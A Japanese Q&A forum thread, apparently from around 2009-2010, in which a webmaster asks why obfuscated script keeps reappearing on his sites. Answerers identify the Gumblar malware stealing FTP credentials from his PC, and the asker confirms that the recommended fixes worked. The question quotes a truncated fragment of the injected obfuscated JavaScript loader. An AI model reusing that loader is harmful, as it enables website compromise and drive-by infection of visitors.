私の管理するサイト数件がいっせいに被害にあっています。
WEBサイトに下記のようなコードが埋め込まれるのです(念のため転記は一部)。
<script>/*GNU GPL*/ try{window.onload = function(){var Xi3ref6qv5 = document.createElement('s$^$(c($r)i))^p!^!#t^(!'.replace(/\!|\^|#|@|\)|\(|\$|&/ig, ''));Xi3ref6qv5.setAttribute('type', 'text/javascript');Xi3ref6qv5.setAttribute('src', 'h^$$t$^&t^&$))p$)&:$^)/(^/!^t@i@!s(!(以下略)
ネット上で同じような被害が多発している旨見まして、手動でコードを削除しています。
削除後FTPのパスワードも変えています。
しかし次の日には同じコードが埋め込まれてしまうのです。
各サイトは、htmlベースの静的なもの、wordpressによるものもありますが、
同じ被害にあっています。
WPサイトは、コードを削除後FTPアカウントとともに、WPの管理者アカウントも変更しています。
サーバーはlolipop、heteml、マイティーサーバを利用していますが、
どのサーバーのものも全部やられています。
この状況から私のPC自体に問題があるのではないかとも疑っております。
ここ数日はやっている現象のように見受けられるのですが、根本的な処置をお教えください。
No.1
591
39
27pt
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。
対策としては、いくつかのソフトを最新にすれば良いようです。
No.1
59139
ここでベストアンサー
27pt
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。
対策としては、いくつかのソフトを最新にすれば良いようです。
ありがとうございました。
ウィルス対策ソフト2種類でチェック、削除をおこない、かつ、FTPパスワードを全て変更し、FTPソフトを使用しないようにしました。
ためしに、一サイトだけ非公開のサイトのFTPを使用可能にして数日様子を見ていますが、どうやら収まった模様です。
No.2
10423
16pt
ハッキングではなく、感染してますね。
http://www.ryan-isra.net/howto-fix-malicious-javascript-suspecte...
断ち切るには、感染経路を調べるのが先ですね。
感染しているのがWordPressらしいので、おそらくWordPressの穴をついた攻撃かと思います。
ですのでパスワードを変えても無駄かもしれません。
サービスを止めて最新のWordPressにするか、WordPressの脆弱性アナウンスを調べると良いかと思います。
wordpressのバージョンを最新にしても同じ症状が発生しましたので、
ウィルスチェック&削除、FTPのパスワードを変えて、FTPを使わないようにしたところ、収束しました。
新しいウィルスソフトを使用したところ、FTPを使用したときに、ウィルスが検出されましたので、おそらくウィルスだったのではないかと思います。
しばらく様子を見てみます。
ありがとうございました。
No.3
10423
5pt
失礼しました。sm0k3さんの言うように、ローカルPCが原因の様ですね。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
はい。
ローカルPCの問題だった模様です。
ありがとうございました。
No.4
25751
28pt
症状からして、ご利用のPCがGumblarウイルスに感染していると思われます。
対策として以下の手順を実施してください。
http://internet.watch.impress.co.jp/cda/special/2009/05/21/23523...
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20091224-OYT8...
ご指摘いただいた対策を全ておこない、
FTPのパスワードを変え、且つ、FTPを使用しないようにしました。
これで、落ち着いている模様です。
ありがとうございました。
No.5
2915301
16pt
Wordpress2.8系の最新版は2.8.6になります。
セキュリティアップデートなので、アップデートは必須と心得ましょう。
WordPress | 日本語 » WordPress 2.8.6 日本語版リリースのお知らせ
マイティーサーバの「お知らせ」では見かけませんでしたが、
各レンタルサーバー会社の「お知らせ」では(重要度にもよりますが)
アップデートの必要性について書かれている場合もありますので、
本家(WordPress | 日本語)以外にも目を通すように、
しておいたほうがよろしいかと思います。
WordPress をご利用のお客様へ / 新着情報 / お知らせ - ロリポップ!
「 WordPress 」 の脆弱性に関する報告 - 大容量・高機能レンタルサーバー「heteml」
※どういったお立場か存じませんが、
管理者としての手落ちだと糾弾されても文句は言えない状況なので、
バックアップを取った上で、早急に対応なさる事をお勧めします。
はい。
今回はかなり身につまされました。
セキュリティに対して再度気を引き締めなおします。
ありがとうございました。
No.8
196
24pt
直接質問とは関係ないですが、id:mattn さんが2番目の回答で引用している ryan-isla を含むURLは感染しているようです。ESET NOD32 が警告出しました。
・JavaScript 有効状態でアクセスしてしまった人は感染確認することをオススメします
・プラグイン有効状態でアクセスしてしまった人も(念のため)感染確認しておくと良いと思います
安全な URL 以外、引用は慎重にしたほうが2次感染予防に良いかと思います
ウィルススキャンソフトを、ESTEに変更したところ、駆除が出来たようです。
ありがとうございました。
No.9
10
18pt
専門的な内容はわかりませんが、ここ数日の動向をまとめてあります。
現状、FTPパスワードを盗まれたことによる改竄なのか、脆弱性を利用した改竄なのか、
特定できていないません。後者のケースを想定した対策が必要かと思われます。
WordPressなどのPHPやHTMLコンテンツ改竄に関する情報を追加中 JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有 http://bit.ly/5p9YNP
症状と、対策の状況から察するに、
ウィルスに感染して、FTPを監視されていた模様です。
パスワードを変更しても、次の日にはまたやられていましたが、
パスワード変更後、FTPを使用しないようにしたら、問題は発生しませんでした。
複数のウィルス対策ソフトで、徹底的に削除を行った結果、FTPを使用しても、改竄はなくなりました。
ありがとうございました。
yokuzai
2010/10/30 11:24:59
39
39
1
4
2
ありがとうございました。
ウィルス対策ソフト2種類でチェック、削除をおこない、かつ、FTPパスワードを全て変更し、FTPソフトを使用しないようにしました。
ためしに、一サイトだけ非公開のサイトのFTPを使用可能にして数日様子を見ていますが、どうやら収まった模様です。